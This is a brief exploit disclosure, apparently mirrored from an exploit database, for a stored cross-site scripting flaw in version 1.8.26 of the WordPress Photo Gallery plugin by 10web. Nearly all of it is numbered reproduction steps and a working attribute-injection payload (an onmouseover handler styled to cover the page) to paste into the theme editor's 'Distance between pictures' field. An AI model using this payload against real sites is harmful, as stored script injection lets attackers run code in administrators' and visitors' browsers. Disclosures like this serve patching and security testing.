Share
## https://sploitus.com/exploit?id=PACKETSTORM:179357
# Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS  
# Date: 2024-07-03  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/  
# Version 1.8.26  
  
  
### Steps to Execute the Payload:  
  
1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2   
2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`  
3. Click Update  
4. You will see the payload executed